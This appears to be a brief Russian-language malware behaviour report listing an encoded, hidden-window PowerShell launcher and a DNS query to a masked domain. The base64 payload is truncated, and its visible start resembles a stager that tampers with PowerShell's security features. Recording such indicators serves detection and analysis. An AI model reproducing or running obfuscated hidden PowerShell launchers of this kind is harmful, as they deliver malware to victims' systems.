Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noProf -sta -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8ATgBUAGEAYgBsAEUALgBQAFMAVgBlAHIAcwBpAE8AbgAuAE0AYQBKAE8AcgAgAC0ARwBFACAAMwApAHsAJABHAFAARgA9AFsAcgBFAGYAXQAuAEEAcwBzAGUATQBCAEwAeQAuAEcAZQB...
- DNS ASK as#####cepromutuel.ca
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noProf -sta -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8ATgBUAGEAYgBsAEUALgBQAFMAVgBlAHIAcwBpAE8AbgAuAE0AYQBKAE8AcgAgAC0ARwBFACAAMwApAHsAJABHAFAARgA9AFsAcgBFAGYAXQAuAEEAcwBzAGUATQBCAEwAeQAuAEcAZQB...' (со скрытым окном)